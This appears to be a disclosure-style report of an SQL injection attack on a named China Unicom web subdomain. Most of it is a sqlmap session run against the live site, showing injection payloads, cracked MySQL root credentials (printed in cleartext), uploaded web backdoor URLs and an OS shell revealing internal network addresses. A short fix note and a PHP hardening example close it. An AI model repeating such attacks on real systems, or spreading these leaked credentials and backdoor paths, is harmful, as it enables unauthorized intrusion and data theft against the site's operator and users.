MySQL injection with ROOT privileges on a China Unicom substation
PHP + MySQL injection, ROOT privileges, a shell can be obtained; everyone knows what can be done after that.
I saw this vulnerability on Heiba Security (黑吧安全网): "17WO phone verification code bypass allows changing any other user's password", so I tested it. The vulnerability is still there, unfixed. I then went on to check the security of the other subdomains.
A Baidu search for "site:17wo.cn" turns up a likely injection point: http://card.17wo.cn/wap/wap_card.php?id=2548
Throw it at sqlmap:
./sqlmap.py --random-agent --batch --thread 10 -u 'card.17wo.cn/wap/wap_card.php?id=2548' --password
sqlmap/1.0-dev-ab36e5a - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 14:24:01
[14:24:01] [INFO] fetched random HTTP User-Agent header from file '/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.2 Safari/530.5
[14:24:01] [INFO] resuming back-end DBMS 'mysql'
[14:24:01] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2548 AND 1953=1953
Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: id=2548 UNION ALL SELECT CONCAT(0x716c647471,0x796b6866457170574455,0x7165736271)#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=2548 AND SLEEP(5)
---
[14:24:02] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.4, PHP 5.5.3
back-end DBMS: MySQL 5.0.11
[14:24:02] [INFO] fetching database users password hashes
[14:24:02] [WARNING] reflective value(s) found and filtering out
[14:24:02] [INFO] the SQL query used returns 6 entries
[14:24:02] [INFO] starting 6 threads
[14:24:02] [INFO] retrieved: "root","*B80A3FB57E2E58C89333D9AEA9A624B1CB8C4520"
[14:24:03] [INFO] retrieved: "",""
[14:24:03] [INFO] retrieved: "pma",""
[14:24:03] [INFO] retrieved: "",""
[14:24:03] [INFO] retrieved: "root","*B80A3FB57E2E58C89333D9AEA9A624B1CB8C4520"
[14:24:03] [INFO] retrieved: "root",""
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
[14:24:03] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[14:24:03] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[14:24:03] [INFO] starting dictionary-based cracking (mysql_passwd)
[14:24:03] [INFO] starting 4 processes
[14:24:33] [INFO] cracked password 'wise' for user 'root'
database management system users password hashes:
[*] pma [1]:
password hash: NULL
[*] root [2]:
password hash: *B80A3FB57E2E58C89333D9AEA9A624B1CB8C4520
clear-text password: wise
password hash: NULL
It cracks the root password straight away.
Let's try executing a command:
[14:26:46] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.4, PHP 5.5.3
back-end DBMS: MySQL 5.0.11
[14:26:46] [INFO] going to use a web backdoor for command prompt
[14:26:46] [INFO] fingerprinting the back-end DBMS operating system
[14:26:46] [WARNING] reflective value(s) found and filtering out
[14:26:46] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[14:26:46] [INFO] retrieved the web server document root: 'D:\xampp\htdocs\pailife'
[14:26:46] [INFO] retrieved web server absolute paths: 'D:/xampp/htdocs/pailife/wap/wap_card.php'
[14:26:46] [INFO] trying to upload the file stager on '/' via LIMIT INTO OUTFILE technique
[14:26:47] [WARNING] unable to upload the file stager on '/'
[14:26:47] [INFO] trying to upload the file stager on '/' via UNION technique
[14:26:48] [WARNING] expect junk characters inside the file as a leftover from UNION query
[14:26:48] [INFO] the remote file /tmpujmue.php is larger than the local file /var/folders/9g/xlxjdbd909d7z4lxrr51tj1m0000gn/T/tmpsx2Rm4
[14:26:50] [INFO] trying to upload the file stager on '/wap' via LIMIT INTO OUTFILE technique
[14:26:53] [WARNING] unable to upload the file stager on '/wap'
[14:26:53] [INFO] trying to upload the file stager on '/wap' via UNION technique
[14:26:59] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
[14:27:00] [INFO] trying to upload the file stager on '/xampp/htdocs/pailife/wap' via LIMIT INTO OUTFILE technique
[14:27:03] [INFO] heuristics detected web page charset 'utf-8'
[14:27:03] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/pailife/wap' - http://card.17wo.cn:80/wap/tmpujmue.php
[14:27:06] [INFO] heuristics detected web page charset 'ascii'
[14:27:06] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/pailife/wap' - http://card.17wo.cn:80/wap/tmpboyhw.php
[14:27:06] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> ipconfig
do you want to retrieve the command standard output? [Y/n/a] Y
[14:27:17] [INFO] heuristics detected web page charset 'GB2312'
command standard output:
---
Windows IP 配置
以太网适配器 本地连接:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::3cf0:d229:52:6821
IPv4 地址 . . . . . . . . . . . . : 10.123.176.75
子网掩码 . . . . . . . . . . . . : 255.255.255.224
默认网关. . . . . . . . . . . . . : 10.123.176.67
隧道适配器 本地连接* 4:
连接特定的 DNS 后缀 . . . . . . . :
IPv6 地址 . . . . . . . . . . . . : 2001:0:9d38:6ab8:b0:7d8:f584:4fb4
本地链接 IPv6 地址. . . . . . . . : fe80::b0:7d8:f584:4fb4
默认网关. . . . . . . . . . . . . : ::
隧道适配器 isatap.{DD9307C7-D162-4559-AFA6-28E9AA162058}:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
---
Works without any problem.
From here on anything can be done...
Before posting this vulnerability I searched Heiba Security and found that someone had already reported a related vulnerability last year. More than half a year later it still has not been fixed. Consider this report one more reminder to the people responsible.
Fix:
First, raise security awareness (a vulnerability this old still unfixed); second, prevent injection and lower the database privileges...
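As an added example (not the site's own code, which is not known), here is a hypothetical reconstruction of the pattern behind wap_card.php?id=... alongside a hardened version that applies the two fixes named above: a typed, parameterised query, and a least-privilege database account instead of root. The table and column names, the card_app account and the CARD_DB_PASSWORD environment variable are assumptions.

```php
<?php
// Added example, not the site's actual code. The card table, its columns,
// the card_app account and CARD_DB_PASSWORD are assumptions for illustration.

// --- Vulnerable pattern (illustrative): the id parameter is concatenated
// verbatim, so "2548 AND 1953=1953", "2548 UNION ALL SELECT ..." or
// "2548 AND SLEEP(5)" (the payloads sqlmap reported above) reach MySQL intact.
function fetch_card_vulnerable(mysqli $db, string $id): ?array {
    $sql = "SELECT id, title, body FROM card WHERE id = $id";  // no typing, no binding
    $res = $db->query($sql);
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

// --- Hardened version: validate the type, bind the value, fail closed.
function fetch_card_safe(mysqli $db, string $rawId): ?array {
    // 1. Input typing: id must be a positive integer or the request is rejected.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }
    // 2. Prepared statement: the value is sent separately from the SQL text,
    //    so nothing in $rawId can change the structure of the query.
    $stmt = $db->prepare('SELECT id, title, body FROM card WHERE id = ?');
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    return $stmt->get_result()->fetch_assoc() ?: null;
}

// 3. Least privilege: connect as a dedicated account, never as root. An account
//    created with only SELECT on this schema and without the FILE privilege, e.g.
//      CREATE USER 'card_app'@'localhost' IDENTIFIED BY '<strong password>';
//      GRANT SELECT ON card_db.* TO 'card_app'@'localhost';
//    cannot read password hashes from mysql.user or write a stager with
//    INTO OUTFILE, which is exactly what the root connection allowed above.
$db = new mysqli('localhost', 'card_app', getenv('CARD_DB_PASSWORD'), 'card_db');
$db->set_charset('utf8mb4');

$card = fetch_card_safe($db, $_GET['id'] ?? '');
if ($card === null) {
    exit('Card not found');
}
// Output encoding, so stored content cannot become script in the page.
echo htmlspecialchars($card['title'], ENT_QUOTES, 'UTF-8');
```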